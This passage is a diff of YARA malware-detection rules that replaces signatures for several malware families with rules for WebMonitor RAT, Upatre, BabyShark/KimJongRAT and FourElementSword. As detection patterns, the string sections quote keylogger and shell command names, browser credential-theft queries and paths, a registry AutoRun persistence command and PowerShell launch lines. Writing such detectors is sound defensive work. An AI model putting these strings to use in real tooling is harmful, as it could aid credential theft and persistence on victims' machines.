-		description = "Auto-generated rule - file e.exe"
+		description = "Detects WebMonitor RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a1b8e477-df8a-5ff4-9108-541a0f082f77"
-		date = "2018-01-29"
-		modified = "2023-01-06"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tophat.yar#L38-L60"
+		id = "5378f22e-4bba-50e7-8374-5135e980e06b"
+		date = "2018-04-13"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_webmonitor_rat.yar#L1-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2321e89559363c04ef0e92a9c9e03d11ff27410103b3aaba954b544e33961b2f"
+		logic_hash = "fbf6368527a7bd841b7679d668d6b77ce720fd0f6bcbd5fa9ff6301ae72199ec"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9580d15a06cd59c01c59bca81fa0ca8229f410b264a38538453f7d97bfb315e7"
+		hash1 = "27aaad8a7b3fd53d99077a9202e8bed05696c843ed2485bea6eb9e33a1c273ac"
+		hash2 = "05111c305028b5d822ecd12de9879560223c42860cc9d448c47886c236648607"
 
 	strings:
-		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" fullword ascii
-		$s2 = "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\" ascii
-		$s3 = "LError loading dock zone from the stream. Expecting version %d, but found %d." fullword wide
-		$s4 = "WINMGMTS:\\\\.\\ROOT\\CIMV2" fullword ascii
-		$s5 = "UENCRYPTION" fullword ascii
-		$s6 = "TEXPORTAPIS" fullword ascii
+		$x1 = "send_keylog_stream_start" fullword wide
+		$x2 = "KEYLOG_STREAM_STOP" fullword wide
+		$s1 = "SHELL_EXEC" fullword wide
+		$s2 = "send_shell_exec" fullword wide
+		$s3 = "send_connections_get" fullword wide
+		$a1 = "Select * from Win32_PerfRawData_PerfProc_Process where IDProcess = '" fullword wide
+		$a2 = "Select * from Win32_Process WHERE handle =" fullword wide
+		$a3 = "Select * from Win32_Process where ProcessId=" fullword wide
+		$a4 = "Select * from Win32_ComputerSystem" fullword wide
+		$a5 = "The service is in the process of being continued" fullword wide
+		$a6 = "tcpdump" fullword wide
+		$a7 = "memdump" fullword wide
+		$a8 = "<val1>Processor</val1>" fullword wide
+		$a9 = "Win32 share process" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "f98cebcae832abc3c46e6e296aecfc03" and 5 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or ( 2 of ( $s* ) and 2 of ( $a* ) ) or 7 of them )
 }
-rule SIGNATURE_BASE_Tophat_BAT : FILE
+rule SIGNATURE_BASE_Upatre_Hazgurut : FILE
 {
 	meta:
-		description = "Auto-generated rule - file cgen.bat"
+		description = "Detects Upatre malware - file hazgurut.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "81e84f1b-0ee7-530d-91ea-645c0994e68f"
-		date = "2018-01-29"
+		id = "b0040452-ed63-5e90-9ed6-4f05e7b4eadc"
+		date = "2015-10-13"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tophat.yar#L62-L78"
+		reference = "https://weankor.vxstream-sandbox.com/sample/6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3?environmentId=7"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_upatre_oct15.yar#L8-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5dc58fa39d8b2aed95b39da575191fe5d10d5dd95b57c320cde8983505e7184f"
-		score = 75
+		logic_hash = "41dd2f615d1c75ef81073d26bfbdb4f5c6735d9a3ff6d543ca77d6e16fe7eb5b"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f998271c4140caad13f0674a192093092e2a9f7794a7fbbdaa73ae8f2496c387"
-		hash2 = "0fbc6fd653b971c8677aa17ecd2749200a4a563f9dd5409cfb26d320618db3e2"
+		hash1 = "7ee0d20b15e24b7fe72154d9521e1959752b4e9c20d2992500df9ac096450a50"
+		hash2 = "79ffc620ddb143525fa32bc6a83c636168501a4a589a38cdb0a74afac1ee8b92"
+		hash3 = "62d8a6880c594fe9529158b94a9336179fa7a3d3bf1aa9d0baaf07d03b281bd3"
+		hash4 = "c64282aca980d558821bec8b3dfeae562d9620139dc43d02ee4d1745cd989f2a"
+		hash5 = "a35f9870f9d4b993eb094460b05ee1f657199412807abe6264121dd7cc12aa70"
+		hash6 = "f8cb2730ebc8fac1c58da1346ad1208585fe730c4f03d976eb1e13a1f5d81ef9"
+		hash7 = "b65ad7e2d299d6955d95b7ae9b62233c34bc5f6aa9f87dc482914f8ad2cba5d2"
+		hash8 = "6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3"
+		hash9 = "33a288cef0ae7192b34bd2ef3f523dfb7c6cbc2735ba07edf988400df1713041"
+		hash10 = "2a8e50afbc376cb2a9700d2d83c1be0c21ef942309676ecac897ba4646aba273"
+		hash11 = "3d0f2c7e07b7d64b1bad049b804ff1aae8c1fc945a42ad555eca3e1698c7f7d3"
+		hash12 = "951360b32a78173a1f81da0ded8b4400e230125d05970d41621830efc5337274"
+		hash13 = "bd90faebfd7663ef89b120fe69809532cada3eb94bb94094e8bc615f70670295"
+		hash14 = "8c5823f67f9625e4be39a67958f0f614ece49c18596eacc5620524bc9b6bad3d"
 
 	strings:
-		$s1 = "= New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"" ascii
-		$s2 = "goto Start" fullword ascii
-		$s3 = ":Start" fullword ascii
+		$a1 = "barcod" fullword ascii
+		$s0 = "msports.dll" fullword ascii
+		$s1 = "nddeapi.dll" fullword ascii
+		$s2 = "glmf32.dll" fullword ascii
+		$s3 = "<requestedExecutionLevel level=\"requireAdministrator\" uiAccess=\"false\">" fullword ascii
+		$s4 = "cmutil.dll" fullword ascii
+		$s5 = "mprapi.dll" fullword ascii
+		$s6 = "glmf32.dll" fullword ascii
 
 	condition:
-		filesize < 5KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1500KB and $a1 in ( 0 .. 4000 ) and all of ( $s* )
 }
-rule SIGNATURE_BASE_SUSP_BAT_OBFUSC_Jul24_1 : FILE
+
+rule SIGNATURE_BASE_MAL_PE_Type_Babyshark_Loader : FILE
 {
 	meta:
-		description = "Detects indicators of obfuscation in Windows Batch files"
-		author = "Florian Roth"
-		id = "801e7efc-2c31-5590-afcd-9e11072c9c65"
-		date = "2024-07-12"
-		modified = "2024-12-12"
-		reference = "https://x.com/0xToxin/status/1811656147943752045"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_bat_obfusc_jul24.yar#L2-L16"
+		description = "Detects PE Type babyShark loader mentioned in February 2019 blog post by PaloAltNetworks"
+		author = "Florian Roth (Nextron Systems)"
+		id = "141e7a67-7930-5fd8-ac91-5d31b99e4ff3"
+		date = "2019-02-24"
+		modified = "2023-12-05"
+		reference = "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_babyshark.yar#L4-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "683f4651eb8c5b74eca16e7f97c5c44f0d70f045ea49f1f3726cb6975aba2ab9"
-		score = 70
+		logic_hash = "0ab9a30cb731922d965a9cf58094fea36d5c74b9989324efee603808591ea6a5"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c"
 
 	strings:
-		$s1 = "&&set "
+		$x1 = "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\" /v AutoRun /t REG_SZ /d \"%s\" /f" fullword ascii
+		$x2 = /mshta\.exe http:\/\/[a-z0-9\.\/]{5,30}\.hta/
+		$xc1 = { 57 69 6E 45 78 65 63 00 6B 65 72 6E 65 6C 33 32
+               2E 44 4C 4C 00 00 00 00 }
 
 	condition:
-		filesize < 300KB and uint32( 0 ) == 0x20746573 and $s1 in ( 0 .. 32 )
+		uint16( 0 ) == 0x5a4d and ( pe.imphash ( ) == "57b6d88707d9cd1c87169076c24f962e" or 1 of them or for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "thawte SHA256 Code Signing CA" and pe.signatures [ i ] . serial == "0f:ff:e4:32:a5:3f:f0:3b:92:23:f8:8b:e1:b8:3d:9d" ) )
 }
-rule SIGNATURE_BASE_SUSP_BAT_OBFUSC_Jul24_2 : FILE
+rule SIGNATURE_BASE_APT_NK_Babyshark_Kimjoingrat_Apr19_1 : FILE
 {
 	meta:
-		description = "Detects indicators of obfuscation in Windows Batch files"
-		author = "Florian Roth"
-		id = "999cd365-2862-5618-b0b6-ee45dea1e9cf"
-		date = "2024-07-12"
-		modified = "2024-12-12"
-		reference = "https://x.com/0xToxin/status/1811656147943752045"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_bat_obfusc_jul24.yar#L18-L35"
+		description = "Detects BabyShark KimJongRAT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c6bd1e1a-68f2-5a2d-a159-b16ea0d33987"
+		date = "2019-04-27"
+		modified = "2023-12-05"
+		reference = "https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_babyshark.yar#L29-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "729ec93d180bf39c146c3fd847655340428abc3231b556ca51d3ca68825e7c3e"
-		score = 70
+		logic_hash = "3fec0f21e299e09ae9734f256edbbca81a53f860b42e99a78b07d344552f1062"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712"
 
 	strings:
-		$s1 = "&&set "
+		$x1 = "%s\\Microsoft\\ttmp.log" fullword wide
+		$a1 = "logins.json" fullword ascii
+		$s1 = "https://www.google.com/accounts/servicelogin" fullword ascii
+		$s2 = "https://login.yahoo.com/config/login" fullword ascii
+		$s3 = "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login" ascii
+		$s4 = "\\mozsqlite3.dll" ascii
+		$s5 = "SMTP Password" fullword ascii
+		$s6 = "Yandex\\YandexBrowser\\User Data\\Default\\Login Data" fullword ascii
 
 	condition:
-		filesize < 300KB and #s1 > 30 and uint16( filesize -2 ) == 0x0a0d and uint8( filesize -3 ) == 0x25
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or ( $a1 and 3 of ( $s* ) ) )
 }
-rule SIGNATURE_BASE_SUSP_BAT_OBFUSC_Jul24_3 : FILE
+rule SIGNATURE_BASE_Fourelementsword_Config_File
 {
 	meta:
-		description = "Detects indicators of obfuscation in Windows Batch files"
-		author = "Florian Roth"
-		id = "a484ed03-8588-55e7-9674-b1208e14eb3f"
-		date = "2024-07-12"
-		modified = "2024-12-12"
-		reference = "https://x.com/0xToxin/status/1811656147943752045"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_bat_obfusc_jul24.yar#L37-L54"
+		description = "Detects FourElementSword Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "488a2344-3d8d-5769-aca8-9e14f38f5eb0"
+		date = "2016-04-18"
+		modified = "2023-12-05"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L11-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ecbe7850349f0368620ff4294e5d0ca277983799eed510f8bf8abe4d4c192197"
-		score = 70
+		hash = "f05cd0353817bf6c2cab396181464c31c352d6dea07e2d688def261dd6542b27"
+		logic_hash = "680e50998093e63a4e3c7d5338ac149efef83cdb41ceb4ce0245e8bd2ab99b84"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "% \\\\%"
-		$s2 = { 3D ?? 26 26 73 65 74 20 }
+		$s0 = "01,,hccutils.dll,2" fullword ascii
+		$s1 = "RegisterDlls=OurDll" fullword ascii
+		$s2 = "[OurDll]" fullword ascii
+		$s3 = "[DefaultInstall]" fullword ascii
+		$s4 = "Signature=\"$Windows NT$\"" fullword ascii
 
 	condition:
-		filesize < 300KB and all of them
+		4 of them
 }
-
-rule SIGNATURE_BASE_MAL_Devilstongue_Hijackdll : FILE
+rule SIGNATURE_BASE_Fourelementsword_T9000 : FILE
 {
 	meta:
-		description = "Detects SOURGUM's DevilsTongue hijack DLL"
-		author = "Microsoft Threat Intelligence Center (MSTIC)"
-		id = "390b8b73-6740-513d-8c70-c9002be0ce69"
-		date = "2021-07-15"
+		description = "Detects FourElementSword Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "35ae844e-52e1-5e6f-984d-aa75ebd2f60f"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_candiru.yar#L3-L47"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L30-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4ad58a77f9ab5fa078dc40f3ec1d0b0180f25ff3ea304a3c85889df29739e0f5"
-		score = 80
+		hash = "5f3d0a319ecc875cc64a40a34d2283cb329abcf79ad02f487fbfd6bef153943c"
+		logic_hash = "1c7b063cbe9d44a9d194a180570f8313460f61560ac2cda5d66e048934170faa"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$str1 = "windows.old\\windows" wide
-		$str2 = "NtQueryInformationThread"
-		$str3 = "dbgHelp.dll" wide
-		$str4 = "StackWalk64"
-		$str5 = "ConvertSidToStringSidW"
-		$str6 = "S-1-5-18" wide
-		$str7 = "SMNew.dll"
-		$code1 = { B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8 }
-		$code2 = { 44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19 }
+		$x1 = "D:\\WORK\\T9000\\" ascii
+		$x2 = "%s\\temp\\HHHH.dat" fullword wide
+		$s1 = "Elevate.dll" fullword wide
+		$s2 = "ResN32.dll" fullword wide
+		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword wide
+		$s4 = "igfxtray.exe" fullword wide
 
 	condition:
-		filesize < 800KB and uint16( 0 ) == 0x5A4D and ( pe.characteristics & pe.DLL ) and ( 4 of them or ( $code1 and $code2 ) or pe.imphash ( ) == "9a964e810949704ff7b4a393d9adda60" )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Hdroot_Sample_Jul17_1 : FILE
+rule SIGNATURE_BASE_Fourelementsword_32DLL : FILE
 {
 	meta:
-		description = "Detects HDRoot samples"
+		description = "Detects FourElementSword Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "06356f8a-bacd-51bc-a6f4-107983a9c16e"
-		date = "2017-07-07"
+		id = "fc801364-9f40-50eb-90e1-99f8605014c7"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "Winnti HDRoot VT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_hdroot.yar#L11-L26"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L51-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "41127e6d70af4b095555285f3d5570fc4dbe2a7918664502057cdc4fed8fab33"
+		hash = "7a200c4df99887991c638fe625d07a4a3fc2bdc887112437752b3df5c8da79b6"
+		logic_hash = "b44870975f126b8603db04b97b748f7a5a75675ffe57037f613c11d6048200b1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6d2ad82f455becc8c830d000633a370857928c584246a7f41fe722cc46c0d113"
 
 	strings:
-		$s1 = "gleupdate.dll" fullword ascii
-		$s2 = "\\DosDevices\\%ws\\system32\\%ws" wide
-		$s3 = "l\\Driver\\nsiproxy" fullword wide
+		$x1 = "%temp%\\tmp092.tmp" fullword ascii
+		$s1 = "\\System32\\ctfmon.exe" ascii
+		$s2 = "%SystemRoot%\\System32\\" ascii
+		$s3 = "32.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 60KB and 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 660KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_Hdroot_Sample_Jul17_2 : FILE
+rule SIGNATURE_BASE_Fourelementsword_Keyainst_EXE : FILE
 {
 	meta:
-		description = "Detects HDRoot samples"
+		description = "Detects FourElementSword Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9ce9c0f4-e6f9-5033-ba74-367e6d741650"
-		date = "2017-07-07"
+		id = "175fe2b0-3c76-5464-9a1a-218a09b25a5a"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "Winnti HDRoot VT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_hdroot.yar#L28-L64"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L70-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "94288abb5c4da7c4b07eeae55070797af1556dac35ad012aff1bbe8c05e0a215"
+		hash = "cf717a646a015ee72f965488f8df2dd3c36c4714ccc755c295645fe8d150d082"
+		logic_hash = "1491de3241a81cce4d80d6dc23886f1d8bf316112c48652a8138aa4cbadbb174"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1c302ed9786fc600073cc6f3ed2e50e7c23785c94a2908f74f92971d978b704b"
-		hash2 = "3b7cfa40e26fb6b079b55ec030aba244a6429e263a3d9832e32ab09e7a3c4a9c"
-		hash3 = "71eddf71a94c5fd04c9f3ff0ca1eb6b1770df1a3a8f29689fb8588427b5c9e8e"
-		hash4 = "80e088f2fd2dbde0f9bc21e056b6521991929c4e0ecd3eb5833edff6362283f4"
 
 	strings:
-		$x1 = "http://microsoftcompanywork.htm" fullword ascii
-		$x2 = "compose.aspx?s=%4X%4X%4X%4X%4X%4X" fullword ascii
-		$t1 = "http://babelfish.yahoo.com/translate_url?" fullword ascii
-		$t2 = "http://translate.google.com/translate?prev=hp&hl=en&js=n&u=%s?%d&sl=es&tl=en" fullword ascii
-		$u1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5." ascii
-		$u2 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)" fullword ascii
-		$u3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; TERA:" fullword ascii
-		$s1 = "\\system32\\ntoskrnl.exe" ascii
-		$s2 = "Schedsvc.dll" fullword wide
-		$s3 = "dllserver64.dll" fullword ascii
-		$s4 = "C:\\TERA_SR.txt" fullword ascii
-		$s5 = "updatevnsc.dat" fullword wide
-		$s6 = "tera dll service global event" fullword ascii
-		$s7 = "Referer: http://%s/%s" fullword ascii
-		$s8 = "tera replace dll config" fullword ascii
-		$s9 = "SetupDll64.dll" fullword ascii
-		$s10 = "copy %%ComSpec%% \"%s\"" fullword ascii
+		$x1 = "C:\\ProgramData\\Keyainst.exe" fullword ascii
+		$s1 = "ShellExecuteA" fullword ascii
+		$s2 = "GetStartupInfoA" fullword ascii
+		$s3 = "SHELL32.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 1 of ( $x* ) or all of ( $u* ) or 8 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 48KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_Unspecified_Malware_Jul17_1A : FILE
+rule SIGNATURE_BASE_Fourelementsword_Elevatedll_2 : FILE
 {
 	meta:
-		description = "Detects samples of an unspecified malware - July 2017"
+		description = "Detects FourElementSword Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "348515d5-784f-519d-b426-87b8a53de5f3"
-		date = "2017-07-07"
+		id = "06879d75-18a3-5d49-a963-fa4bee379387"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "Winnti HDRoot VT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_hdroot.yar#L66-L83"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L89-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e23af53be3e700055ea6536669065c131e7f674d45e43a389447c8c1f549dee5"
+		hash = "9c23febc49c7b17387767844356d38d5578727ee1150956164883cf555fe7f95"
+		logic_hash = "d5fcb2bacfa0a1f78bfbd3fa7ba3084da9a60f1b8b7880c83d8f225312c179b4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e1c38142b6194237a4cd4603829aa6edb6436e7bba15e3e6b0c9e8c6b629b42b"
 
 	strings:
-		$s1 = "%SystemRoot%\\System32\\wuauserv.dll" fullword ascii
-		$s2 = "systemroot%\\system32\\wuauserv.dll" fullword ascii
-		$s3 = "ocgen.logIN" fullword wide
-		$s4 = "ocmsn.logIN" fullword wide
-		$s5 = "Install.log" fullword wide
+		$s1 = "Elevate.dll" fullword ascii
+		$s2 = "GetSomeF" fullword ascii
+		$s3 = "GetNativeSystemInfo" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 25KB and $s1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_LOG_APT_WEBSHELL_Solarwinds_SUNBURST_Report_Webshell_Dec20_2
+rule SIGNATURE_BASE_Fourelementsword_Fslapi_Dll_Gui : FILE
 {
 	meta:
-		description = "Detects webshell access mentioned in FireEye's SUNBURST report"
+		description = "Detects FourElementSword Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fb86164d-13de-5357-8f52-c597b51127ff"
-		date = "2020-12-21"
+		id = "1cc73eaf-7463-5070-97e5-6ea4c7735371"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_susp_sunburst.yar#L21-L32"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L106-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ec52e244a483ace0f6932b553b159b23b767c00d1f64a4711e5f359832e846f5"
+		hash = "2a6ef9dde178c4afe32fe676ff864162f104d85fac2439986de32366625dc083"
+		logic_hash = "909b187f864a240268d0ffcef904b85cd1eaad97dd3a3a808aad58968fbb76c2"
 		score = 75
-		quality = 60
-		tags = ""
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xr1 = /logoimagehandler.ashx[^\n\s]{1,400}clazz=/ ascii wide
+		$s1 = "fslapi.dll.gui" fullword wide
+		$s2 = "ImmGetDefaultIMEWnd" fullword ascii
+		$s3 = "RichOX" fullword ascii
 
 	condition:
-		$xr1
+		( uint16( 0 ) == 0x5a4d and filesize < 12KB and all of them )
 }
-rule SIGNATURE_BASE_APT_Hiddencobra_Enc_PK_Header : HIDDEN_COBRA TYPEFRAME FILE
+rule SIGNATURE_BASE_Fourelementsword_Powershell_Start
 {
 	meta:
-		description = "Hidden Cobra - Detects trojan with encrypted header"
-		author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
-		id = "5d7001b3-162c-5a97-a740-1b8e33d4aa9e"
-		date = "2018-04-12"
+		description = "Detects FourElementSword Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "62affc03-a408-5d8f-99da-58dead8646c5"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ar18_165a.yar#L2-L19"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L123-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d0c8345b69e5f421fd93bc239031f2e51a120ae64be1eca0c1fdae2aa55ac42a"
+		hash = "9b6053e784c5762fdb9931f9064ba6e52c26c2d4b09efd6ff13ca87bbb33c692"
+		logic_hash = "7b1986845d97dcd11c8baddb0b49350ad30c6fff98840275befef4ad0b906b54"
 		score = 75
 		quality = 85
-		tags = "HIDDEN_COBRA, TYPEFRAME, FILE"
-		incident = "10135536"
-		category = "hidden_cobra"
-		family = "TYPEFRAME"
-		hash0 = "3229a6cea658b1b3ca5ca9ad7b40d8d4"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 }
-		$s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a }
-		$s2 = { ae 1d af 74 c0 f5 e1 02 50 10 }
+		$s0 = "start /min powershell C:\\\\ProgramData\\\\wget.exe" ascii
+		$s1 = "start /min powershell C:\\\\ProgramData\\\\iuso.exe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_APT_Hiddencobra_Import_Obfuscation_2 : HIDDEN_COBRA TYPEFRAME FILE
+rule SIGNATURE_BASE_Fourelementsword_Resn32Dll
 {
 	meta:
-		description = "Hidden Cobra - Detects remote access trojan"
-		author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
